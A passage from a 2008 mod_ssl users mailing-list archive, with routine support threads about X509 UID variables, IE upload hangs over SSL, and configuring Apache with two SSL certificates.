FrQOCsEUmszi7Se0Vxr2k1P7icxT7L/AcWt/djIgp/vsQNurbi0+5+q7YS2b2bc1HchjsmaI
cXy8ha5IGk4+F1qrHZsGqTm5M7TzZN6k0X2llMaozrtPzxNMC6uvf1uRvHYHf1x0Q0pdxTzZ
PuuFw1PUlu6o5xPHbf3ZgC7ZNSDry13ZEXmlG2Re0u9WwEJJ1nYqlcDvNzGCAq4wggKqAgEB
MGUwWzELMAkGA1UEBhMCRlIxEDAOBgNVBAoTB0VkZWxXZWIxGDAWBgNVBAsTD1NlcnZpY2Ug
RWRlbFBLSTEgMB4GA1UEAxMXRWRlbFBLSSBFZGVsV2ViIFBlcnNHRU4CBgqvijKA3jAJBgUr
DgMCGgUAoIIBnzAYBgkqhkiG9w0BCQMxCwYJKoZIhvcNAQcBMBwGCSqGSIb3DQEJBTEPFw0w
ODEwMTAxNDQ5NTRaMCMGCSqGSIb3DQEJBDEWBBQOEtlBCCPE0YCUR4JsfFpDNcKUKjBSBgkq
hkiG9w0BCQ8xRTBDMAoGCCqGSIb3DQMHMA4GCCqGSIb3DQMCAgIAgDANBggqhkiG9w0DAgIB
QDAHBgUrDgMCBzANBggqhkiG9w0DAgIBKDB0BgkrBgEEAYI3EAQxZzBlMFsxCzAJBgNVBAYT
AkZSMRAwDgYDVQQKEwdFZGVsV2ViMRgwFgYDVQQLEw9TZXJ2aWNlIEVkZWxQS0kxIDAeBgNV
BAMTF0VkZWxQS0kgRWRlbFdlYiBQZXJzR0VOAgYKr4oygN4wdgYLKoZIhvcNAQkQAgsxZ6Bl
MFsxCzAJBgNVBAYTAkZSMRAwDgYDVQQKEwdFZGVsV2ViMRgwFgYDVQQLEw9TZXJ2aWNlIEVk
ZWxQS0kxIDAeBgNVBAMTF0VkZWxQS0kgRWRlbFdlYiBQZXJzR0VOAgYKr4oygN4wDQYJKoZI
hvcNAQEBBQAEgYAKQjKxXBTql4sPXfca7VVJ0pFXtxxdFeLS9GeWp0vlSpNIgRnOyk+v1op7
Uf9ozV4HRhFMDw2Yh59+vutv1bYVYu6HRv7cicS32+xppPLRhpP7B0o+nGfuHFF2P/g6XMYj
YimJr5sAyQD/Zrz2+fIcdV/l1gwVQTOkzg4INWsJ7wAAAAAAAA==
--------------ms080105090707050509030302--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 10 17:39:27 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id AA98F14DA5F; Fri, 10 Oct 2008 17:39:27 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from mo-p00-ob.rzone.de (mo-p00-ob.rzone.de [81.169.146.162])
	by master.modssl.org (Postfix) with ESMTP id 60A1914D82F
	for ; Fri, 10 Oct 2008 17:39:27 +0200 (CEST)
X-RZG-CLASS-ID: mo00
X-RZG-AUTH: :IWUHfUGtd9+vE/nIU31usF8LLMefsb7t6jGFCjOtWWkYYor1wfCDrbylFgNd4Zc=
Received: from [10.1.1.5] (p54A3543C.dip.t-dialin.net [84.163.84.60])
	by post.webmailer.de (klopstock mo15) (RZmta 17.10)
	with DHE-RSA-AES128-SHA encrypted ESMTP id U066e0k9AFcLTt
	for ; Fri, 10 Oct 2008 17:38:21 +0200 (MEST)
	(envelope-from: )
Message-ID: <48EF76EC.2010701@stroeder.com>
Date: Fri, 10 Oct 2008 17:38:20 +0200
From: =?ISO-8859-1?Q?Michael_Str=F6der?= 
User-Agent: Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.8.1.17) Gecko/20080829 SeaMonkey/1.1.12
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: X509 variables  ..UID
References: <48EF6B92.3010508@edelweb.fr>
In-Reply-To: <48EF6B92.3010508@edelweb.fr>
Content-Type: text/plain; charset=ISO-8859-1
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: =?ISO-8859-1?Q?Michael_Str=F6der?= 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Peter Sylvester wrote:
> in ssl_engine_vars, there seems to be a problem to me concerning the UID
> field.
> The syntax for the field is a bitstring and not a "text".

Nothing happened since I've filed this bug and raised the issue here:

  https://issues.apache.org/bugzilla/show_bug.cgi?id=45107

It's broken => it should be fixed. Unfortunately no-one cares. :-(

Ciao, Michael.
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Fri Oct 10 22:04:44 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 374B814DA60; Fri, 10 Oct 2008 22:04:44 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from frfcqmg011ix3r8.montpellier.mebs.ihost.com (mail2.aspaway.fr [129.35.163.230])
	by master.modssl.org (Postfix) with ESMTP id AB8D414D82F
	for ; Fri, 10 Oct 2008 22:04:41 +0200 (CEST)
Received: from frfcqws071ix328.infra.montpellier.mebs.ihost.com (frfcqws071ix328 [10.0.77.8])
	by frfcqmg011ix3r8.montpellier.mebs.ihost.com (8.12.11.20060308/8.12.11) with ESMTP id m9AK2qo5017039
	for ; Fri, 10 Oct 2008 22:02:52 +0200
Subject: Jean-Pierre Guilloteau est absent.
From: jpguilloteau@aspaway.fr
To: modssl-users@modssl.org
Message-ID: 
Date: Fri, 10 Oct 2008 22:03:34 +0200
X-MIMETrack: Serialize by Router on MES01ASP/SRV/ASPAWAY(Release 7.0.2|September 26, 2006) at
 10/10/2008 10:03:35 PM
MIME-Version: 1.0
Content-type: text/plain; charset=ISO-8859-1
Content-transfer-encoding: quoted-printable
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: jpguilloteau@aspaway.fr
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


I will be out of the office starting Fri 10/10/08 and will not return u=
ntil
Mon 27/10/08.

Je r=E9pondrai =E0 votre message d=E8s mon retour.
Cordialement.=


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Oct 15 13:08:44 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 18A7414DA5E; Wed, 15 Oct 2008 13:08:44 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from smtpgate.saa-cons.co.uk (ns0.reims.net [194.75.234.2])
	by master.modssl.org (Postfix) with ESMTP id A5ED014D82F
	for ; Wed, 15 Oct 2008 13:08:43 +0200 (CEST)
Subject: IE + SSL = File Upload Problems
To: modssl-users@modssl.org
Message-ID: 
Date: Wed, 15 Oct 2008 12:07:31 +0100
From: Dave.Chapman@saaconsultants.com
MIME-Version: 1.0
Content-type: text/plain; charset=US-ASCII
X-WatchGuard-IPS: message checked
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Dave.Chapman@saaconsultants.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users


Hello,

Hopefully someone can help...

Environment:

Apache httpd 2.2 + mod_proxy + JK2 + mod_ssl --> JBoss (Tomcat 5.5)

IE 6/7 + WinXP Pro/Win 2003

Problem:

When a large file upload from a http form post reaches a "max allowed
limit" (e.g. 20Mb) on the server, the server returns a response (e.g.
413/406).
Somewhere the SSL part is causing (only) IE to hang for a while (consume
lots of memory/processor time) and then display a page that says:

"Navigation to the webpage was stopped..."

Note: Turning SSL off fixes this behaviour.

Can anyone shed any light on what might be causing this?

Cheers,
Dave

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 20 09:56:57 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C6A7914DA54; Mon, 20 Oct 2008 09:56:57 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from houston.hostforweb.net (houston.hostforweb.net [205.234.140.185])
	by master.modssl.org (Postfix) with ESMTP id 0902714D82E
	for ; Mon, 20 Oct 2008 09:56:56 +0200 (CEST)
Received: from cm-staticip-85-152-25-140.telecable.es ([85.152.25.140]:33796 helo=[10.0.0.10])
	by houston.hostforweb.net with esmtpsa (SSLv3:AES256-SHA:256)
	(Exim 4.69)
	(envelope-from )
	id 1KrpcA-0000ev-RU
	for modssl-users@modssl.org; Mon, 20 Oct 2008 02:55:47 -0500
Subject: unable to start apache with 2 certificates
From: Jorge =?ISO-8859-1?Q?Mart=EDn?= Cuervo 
To: modssl-users@modssl.org
Content-Type: text/plain; charset=UTF-8
Date: Mon, 20 Oct 2008 09:55:45 +0200
Message-Id: <1224489345.2978.20.camel@localhost.localdomain>
Mime-Version: 1.0
X-Mailer: Evolution 2.12.3 (2.12.3-8.el5_2.2) 
Content-Transfer-Encoding: quoted-printable
X-Antivirus-Scanner: Clean mail though you should still use an Antivirus
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - houston.hostforweb.net
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - defactops.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jorge =?ISO-8859-1?Q?Mart=EDn?= Cuervo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi all,

i have a problem with an apache 2.2.9, maybe this is not the correct
mailing list but i am going to ask, my apologizes if this isn't the
properly place.

I had an instance of apache 2.2.9 with and IP serving contents with the
port 80 and 443, we bought a godaddy certificate and all went pretty
well, but we needed to install another certificate for other domain in
the same machine. I had several domains and all works with vhosts with
http, but when i first tried to use several vhosts for secure
connections the apache seemed to restart well but stop working.=20

With an only certificate, apache use to ask me the certificate password,
but when i configure a second one, never asked and stop serving content,
even in http. Then i tried to configure the system with 2 IPs, one for
every certificate, but i got the same problem.

The configuration files seems to be well formed (apachectl -t) and i saw
some examples out of there:
http://www.ibm.com/developerworks/opensource/library/wa-multissl.html

am i doing something wrong? this is the correct mailing list to ask?


thanks, and best regards.

--=20
;-)
____________________________________
Jorge Martin Cuervo
=20
Outsourcing Emarketplace
deFacto Powered by Standards
=20
email 
voice +34 984 832 659
voice +34 660 026 384
____________________________________


DE FACTO STANDARDS, S.L., le informa que su direcci=C3=B3n de correo electr=
=C3=B3nico, as=C3=AD=20
como el resto de los datos de car=C3=A1cter personal que nos facilite, ser=
=C3=A1n objeto=20
de tratamiento automatizado en nuestros ficheros, con la finalidad del env=
=C3=ADo de=20
informaci=C3=B3n comercial y/o personal por v=C3=ADa electr=C3=B3nica. Vd. =
podr=C3=A1 en cualquier=20
momento ejercer el derecho de acceso, rectificaci=C3=B3n, cancelaci=C3=B3n =
y oposici=C3=B3n en=20
los t=C3=A9rminos establecidos en la Ley Org=C3=A1nica de Protecci=C3=B3n d=
e Datos de Car=C3=A1cter=20
Personal (LOPD. 15/1999),  dirigiendo un escrito a C/ Rivero 31 1=C2=BA Izd=
a. - 33402=20
AVILES (Asturias), o a nuestra direcci=C3=B3n de correo electr=C3=B3nico=20
(info@defactops.com). Tambi=C3=A9n informamos que la informaci=C3=B3n inclu=
ida en este=20
e-mail es CONFIDENCIAL, siendo para uso exclusivo del destinatario arriba=20
mencionado. Si Usted lee este mensaje y no es el destinatario indicado, le=20
informamos que est=C3=A1 totalmente prohibida cualquier utilizaci=C3=B3n, d=
ivulgaci=C3=B3n,=20
distribuci=C3=B3n y/o reproducci=C3=B3n de esta comunicaci=C3=B3n sin autor=
izaci=C3=B3n expresa en=20
virtud de la legislaci=C3=B3n vigente.  Si ha recibido este mensaje por err=
or, le=20
rogamos nos lo notifique inmediatamente por esta misma v=C3=ADa y proceda a=
 su=20
eliminaci=C3=B3n.

This e-mail contains information that will be added to our computerised gue=
st=20
data base and will be trated in the strict confidence. If you wish to acces=
s,=20
correct, oppose or cancel your details, as specified the Law 15/99, Decembe=
r=20
13th, please send a certified letter to this effect to DE FACTO STANDARDS,=20
S.L.., (C/ Rivero 31 1=C2=BA Izda. - 33402 AVILES (Asturias) SPAIN). If you=
 read this=20
message, and is not the destinatary, we informal you that is forbidden anyt=
hing=20
utility, distribution, divulgation or reproduction of this communication wi=
thout=20
express authorization, of the present law.  If you received this message fo=
r=20
mistake, we proud in order to the present law, immediate communication to u=
s,=20
and please erase this e-mail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 20 10:17:24 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 4C42314DA54; Mon, 20 Oct 2008 10:17:24 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from fg-out-1718.google.com (fg-out-1718.google.com [72.14.220.156])
	by master.modssl.org (Postfix) with ESMTP id BB81414D82E
	for ; Mon, 20 Oct 2008 10:17:20 +0200 (CEST)
Received: by fg-out-1718.google.com with SMTP id e21so1356164fga.7
        for ; Mon, 20 Oct 2008 01:16:13 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
        d=gmail.com; s=gamma;
        h=domainkey-signature:received:received:message-id:date:from
         :user-agent:mime-version:to:subject:references:in-reply-to
         :x-enigmail-version:content-type;
        bh=gun2Vg9wZq3aH4yrmp+tzvPAAMdlRjWywxHvKuMA6z4=;
        b=wmFQiIQ6C0l1YZv1rOyJoiWNTNpQ9IHvQMDyk05e2Vf/VYrFOh3xwAN+jnUMBp/FbD
         +BYB27SyQn268Hzo0d0ZythUY6kVv42ETfbsJf93vdNqDG7w2pSuskz4Jj8klhw3bCuB
         YHaHG6zFgPKlM9VtfD6JJmudt2NHW9DLBq1fE=
DomainKey-Signature: a=rsa-sha1; c=nofws;
        d=gmail.com; s=gamma;
        h=message-id:date:from:user-agent:mime-version:to:subject:references
         :in-reply-to:x-enigmail-version:content-type;
        b=Nk462q9ctkuOQq2UkfZX0gl2hQ9fmkcN4pKUBY/kLR9jFo6pFIH5YnjtIuJaIFg46e
         iPi2LW/wtOqmLcE4WAf+K/yFcBeuY6yP7iuAxUTRI/Jp/OYf4+1SFswvN8Xc8FnakXjq
         0pkdo976wr48mGHu1ZYek7W77qgt0Vstu6J6k=
Received: by 10.181.137.17 with SMTP id p17mr2554076bkn.40.1224490573811;
        Mon, 20 Oct 2008 01:16:13 -0700 (PDT)
Received: from ?192.168.12.147? (syloehb.pck.nerim.net [213.41.232.32])
        by mx.google.com with ESMTPS id 31sm14265121fkt.3.2008.10.20.01.16.12
        (version=TLSv1/SSLv3 cipher=RC4-MD5);
        Mon, 20 Oct 2008 01:16:13 -0700 (PDT)
Message-ID: <48FC3E44.8020304@gmail.com>
Date: Mon, 20 Oct 2008 10:16:04 +0200
From: Cuesta Gilles 
User-Agent: Thunderbird 2.0.0.12 (X11/20080213)
MIME-Version: 1.0
To: modssl-users@modssl.org
Subject: Re: unable to start apache with 2 certificates
References: <1224489345.2978.20.camel@localhost.localdomain>
In-Reply-To: <1224489345.2978.20.camel@localhost.localdomain>
X-Enigmail-Version: 0.95.7
Content-Type: multipart/signed; micalg=pgp-sha1;
 protocol="application/pgp-signature";
 boundary="------------enigB1E6C39F5DA9ED4CDDE2F838"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Cuesta Gilles 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

This is an OpenPGP/MIME signed message (RFC 2440 and 3156)
--------------enigB1E6C39F5DA9ED4CDDE2F838
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: quoted-printable

Jorge Mart=C3=ADn Cuervo a =C3=A9crit :
> Hi all,
>
> i have a problem with an apache 2.2.9, maybe this is not the correct
> mailing list but i am going to ask, my apologizes if this isn't the
> properly place.
>
> I had an instance of apache 2.2.9 with and IP serving contents with the=

> port 80 and 443, we bought a godaddy certificate and all went pretty
> well, but we needed to install another certificate for other domain in
> the same machine. I had several domains and all works with vhosts with
> http, but when i first tried to use several vhosts for secure
> connections the apache seemed to restart well but stop working.=20
>  =20
Did you try with SSLPassPhraseDialog in each VirtualHost ? or unciphered
key ?
Wich is result of httpd -S ?

--=20
Gilles CUESTA - Logiciels Libres
69139920



--------------enigB1E6C39F5DA9ED4CDDE2F838
Content-Type: application/pgp-signature; name="signature.asc"
Content-Description: OpenPGP digital signature
Content-Disposition: attachment; filename="signature.asc"

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.6 (GNU/Linux)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org

iD8DBQFI/D5I545quQSHen8RAn89AKCv0jg/G8VnPyaj8RLRhrg5sR19rwCgkqpi
A5ybT97Bq2T/jP5sLeD4r0E=
=PrsG
-----END PGP SIGNATURE-----

--------------enigB1E6C39F5DA9ED4CDDE2F838--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 20 10:33:18 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id C68B614DA5D; Mon, 20 Oct 2008 10:33:18 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from houston.hostforweb.net (houston.hostforweb.net [205.234.140.185])
	by master.modssl.org (Postfix) with ESMTP id C8EDC14DA5B
	for ; Mon, 20 Oct 2008 10:33:16 +0200 (CEST)
Received: from cm-staticip-85-152-25-140.telecable.es ([85.152.25.140]:58328 helo=[10.0.0.10])
	by houston.hostforweb.net with esmtpsa (SSLv3:AES256-SHA:256)
	(Exim 4.69)
	(envelope-from )
	id 1KrqBJ-0004TF-Up
	for modssl-users@modssl.org; Mon, 20 Oct 2008 03:32:06 -0500
Subject: Re: unable to start apache with 2 certificates
From: Jorge =?ISO-8859-1?Q?Mart=EDn?= Cuervo 
To: modssl-users@modssl.org
In-Reply-To: <48FC3E44.8020304@gmail.com>
References: <1224489345.2978.20.camel@localhost.localdomain>
	 <48FC3E44.8020304@gmail.com>
Content-Type: text/plain; charset=utf-8
Date: Mon, 20 Oct 2008 10:32:03 +0200
Message-Id: <1224491523.2978.29.camel@localhost.localdomain>
Mime-Version: 1.0
X-Mailer: Evolution 2.12.3 (2.12.3-8.el5_2.2) 
Content-Transfer-Encoding: quoted-printable
X-Antivirus-Scanner: Clean mail though you should still use an Antivirus
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - houston.hostforweb.net
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - defactops.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jorge =?ISO-8859-1?Q?Mart=EDn?= Cuervo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi Cuesta Guilles, thanks for your quickly reply. No i am going to read
the documentation about SSLPassPhraseDialog.

This is my apachectl -S output:

[jmartin@protean bin]$ ./apachectl -S
VirtualHost configuration:
213.134.38.66:443      cv.smra.org
(/home/jmartin/apache22/conf/extra/httpd-ssl.conf:266)
213.134.38.54:443      www.smartcv.org
(/home/jmartin/apache22/conf/extra/httpd-ssl.conf:81)
wildcard NameVirtualHosts and _default_ servers:
*:80                   is a NameVirtualHost
         default server protean.eu
(/home/jmartin/apache22/conf/httpd.conf:490)
         port 80 namevhost protean.eu
(/home/jmartin/apache22/conf/httpd.conf:490)
         port 80 namevhost madrid.protean.eu
(/home/jmartin/apache22/conf/httpd.conf:506)
         port 80 namevhost portal.protean.eu
(/home/jmartin/apache22/conf/httpd.conf:519)
         port 80 namevhost uk.protean.eu
(/home/jmartin/apache22/conf/httpd.conf:532)
         port 80 namevhost portaldeempleo.curtidora.com
(/home/jmartin/apache22/conf/httpd.conf:545)
         port 80 namevhost ofertasdeempleo.curtidora.com
(/home/jmartin/apache22/conf/httpd.conf:557)
         port 80 namevhost smra.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:572)
         port 80 namevhost gijon.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:580)
         port 80 namevhost esapa.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:588)
         port 80 namevhost curtidora.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:596)
         port 80 namevhost candidato.curtidora.com
(/home/jmartin/apache22/conf/httpd.conf:604)
         port 80 namevhost demo.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:617)
         port 80 namevhost democv.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:624)
         port 80 namevhost fade.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:638)
         port 80 namevhost fadecv.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:645)
         port 80 namevhost flc.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:659)
         port 80 namevhost flccv.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:666)
         port 80 namevhost smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:680)
         port 80 namevhost coiipa.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:708)
         port 80 namevhost coiial.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:715)
         port 80 namevhost colegiado.coiial.net
(/home/jmartin/apache22/conf/httpd.conf:724)
         port 80 namevhost ofertas.coiial.net
(/home/jmartin/apache22/conf/httpd.conf:736)
         port 80 namevhost empleo.coiial.net
(/home/jmartin/apache22/conf/httpd.conf:747)
         port 80 namevhost coiil.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:761)
         port 80 namevhost coiia.smartcv.org
(/home/jmartin/apache22/conf/httpd.conf:768)
         port 80 namevhost smartemployer.org
(/home/jmartin/apache22/conf/httpd.conf:778)
         port 80 namevhost asturiasotrabajas.com
(/home/jmartin/apache22/conf/httpd.conf:792)
         port 80 namevhost asturiasytrabajas.com
(/home/jmartin/apache22/conf/httpd.conf:806)
         port 80 namevhost media.protean.eu
(/home/jmartin/apache22/conf/httpd.conf:820)
         port 80 namevhost protean.es
(/home/jmartin/apache22/conf/httpd.conf:832)
         port 80 namevhost colegios.protean.es
(/home/jmartin/apache22/conf/httpd.conf:846)
         port 80 namevhost opea.protean.es
(/home/jmartin/apache22/conf/httpd.conf:858)
Syntax OK


El lun, 20-10-2008 a las 10:16 +0200, Cuesta Gilles escribi=C3=B3:
> Jorge Mart=C3=ADn Cuervo a =C3=A9crit :
> > Hi all,
> >
> > i have a problem with an apache 2.2.9, maybe this is not the correct
> > mailing list but i am going to ask, my apologizes if this isn't the
> > properly place.
> >
> > I had an instance of apache 2.2.9 with and IP serving contents with the
> > port 80 and 443, we bought a godaddy certificate and all went pretty
> > well, but we needed to install another certificate for other domain in
> > the same machine. I had several domains and all works with vhosts with
> > http, but when i first tried to use several vhosts for secure
> > connections the apache seemed to restart well but stop working.=20
> >  =20
> Did you try with SSLPassPhraseDialog in each VirtualHost ? or unciphered
> key ?
> Wich is result of httpd -S ?
>=20
--=20
;-)
____________________________________
Jorge Martin Cuervo
=20
Outsourcing Emarketplace
deFacto Powered by Standards
=20
email 
voice +34 984 832 659
voice +34 660 026 384
____________________________________


DE FACTO STANDARDS, S.L., le informa que su direcci=C3=B3n de correo electr=
=C3=B3nico, as=C3=AD=20
como el resto de los datos de car=C3=A1cter personal que nos facilite, ser=
=C3=A1n objeto=20
de tratamiento automatizado en nuestros ficheros, con la finalidad del env=
=C3=ADo de=20
informaci=C3=B3n comercial y/o personal por v=C3=ADa electr=C3=B3nica. Vd. =
podr=C3=A1 en cualquier=20
momento ejercer el derecho de acceso, rectificaci=C3=B3n, cancelaci=C3=B3n =
y oposici=C3=B3n en=20
los t=C3=A9rminos establecidos en la Ley Org=C3=A1nica de Protecci=C3=B3n d=
e Datos de Car=C3=A1cter=20
Personal (LOPD. 15/1999),  dirigiendo un escrito a C/ Rivero 31 1=C2=BA Izd=
a. - 33402=20
AVILES (Asturias), o a nuestra direcci=C3=B3n de correo electr=C3=B3nico=20
(info@defactops.com). Tambi=C3=A9n informamos que la informaci=C3=B3n inclu=
ida en este=20
e-mail es CONFIDENCIAL, siendo para uso exclusivo del destinatario arriba=20
mencionado. Si Usted lee este mensaje y no es el destinatario indicado, le=20
informamos que est=C3=A1 totalmente prohibida cualquier utilizaci=C3=B3n, d=
ivulgaci=C3=B3n,=20
distribuci=C3=B3n y/o reproducci=C3=B3n de esta comunicaci=C3=B3n sin autor=
izaci=C3=B3n expresa en=20
virtud de la legislaci=C3=B3n vigente.  Si ha recibido este mensaje por err=
or, le=20
rogamos nos lo notifique inmediatamente por esta misma v=C3=ADa y proceda a=
 su=20
eliminaci=C3=B3n.

This e-mail contains information that will be added to our computerised gue=
st=20
data base and will be trated in the strict confidence. If you wish to acces=
s,=20
correct, oppose or cancel your details, as specified the Law 15/99, Decembe=
r=20
13th, please send a certified letter to this effect to DE FACTO STANDARDS,=20
S.L.., (C/ Rivero 31 1=C2=BA Izda. - 33402 AVILES (Asturias) SPAIN). If you=
 read this=20
message, and is not the destinatary, we informal you that is forbidden anyt=
hing=20
utility, distribution, divulgation or reproduction of this communication wi=
thout=20
express authorization, of the present law.  If you received this message fo=
r=20
mistake, we proud in order to the present law, immediate communication to u=
s,=20
and please erase this e-mail

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Mon Oct 20 11:04:26 2008
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 30101)
	id 7FC3E14DA54; Mon, 20 Oct 2008 11:04:26 +0200 (CEST)
Delivered-To: modssl-users@modssl.org
Received: from houston.hostforweb.net (houston.hostforweb.net [205.234.140.185])
	by master.modssl.org (Postfix) with ESMTP id BDF1014D82E
	for ; Mon, 20 Oct 2008 11:04:25 +0200 (CEST)
Received: from cm-staticip-85-152-25-140.telecable.es ([85.152.25.140]:37568 helo=[10.0.0.10])
	by houston.hostforweb.net with esmtpsa (SSLv3:AES256-SHA:256)
	(Exim 4.69)
	(envelope-from )
	id 1KrqfO-0007Tg-WB
	for modssl-users@modssl.org; Mon, 20 Oct 2008 04:03:14 -0500
Subject: Re: unable to start apache with 2 certificates
From: Jorge =?ISO-8859-1?Q?Mart=EDn?= Cuervo 
To: modssl-users@modssl.org
In-Reply-To: <1224491523.2978.29.camel@localhost.localdomain>
References: <1224489345.2978.20.camel@localhost.localdomain>
	 <48FC3E44.8020304@gmail.com>
	 <1224491523.2978.29.camel@localhost.localdomain>
Content-Type: text/plain; charset=utf-8
Date: Mon, 20 Oct 2008 11:03:05 +0200
Message-Id: <1224493385.2978.32.camel@localhost.localdomain>
Mime-Version: 1.0
X-Mailer: Evolution 2.12.3 (2.12.3-8.el5_2.2) 
Content-Transfer-Encoding: quoted-printable
X-Antivirus-Scanner: Clean mail though you should still use an Antivirus
X-AntiAbuse: This header was added to track abuse, please include it with any abuse report
X-AntiAbuse: Primary Hostname - houston.hostforweb.net
X-AntiAbuse: Original Domain - modssl.org
X-AntiAbuse: Originator/Caller UID/GID - [47 12] / [47 12]
X-AntiAbuse: Sender Address Domain - defactops.com
X-Source: 
X-Source-Args: 
X-Source-Dir: 
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Jorge =?ISO-8859-1?Q?Mart=EDn?= Cuervo 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

I tried with an SSLPassPhraseDialog in every VirtualHost and i get this
message:

[jmartin@protean bin]$ ./apachectl -S
Syntax error on line 82
of /home/jmartin/apache22/conf/extra/httpd-ssl.conf:
SSLPassPhraseDialog cannot occur within  section

"or unciphered key ?" how can i do it? do i need to contact with my
certificate provider?

thanks.


El lun, 20-10-2008 a las 10:32 +0200, Jorge Mart=C3=ADn Cuervo escribi=C3=
=B3:
> Did you try with SSLPassPhraseDialog in each VirtualHost ?
--=20
;-)
____________________________________
Jorge Martin Cuervo
=20
Outsourcing Emarketplace
deFacto Powered by Standards
=20
email 
voice +34 984 832 659
voice +34 660 026 384
____________________________________


DE FACTO STANDARDS, S.L., le informa que su direcci=C3=B3n de correo electr=
=C3=B3nico, as=C3=AD=20
como el resto de los datos de car=C3=A1cter personal que nos facilite, ser=
=C3=A1n objeto=20
de tratamiento automatizado en nuestros ficheros, con la finalidad del env=
=C3=ADo de=20
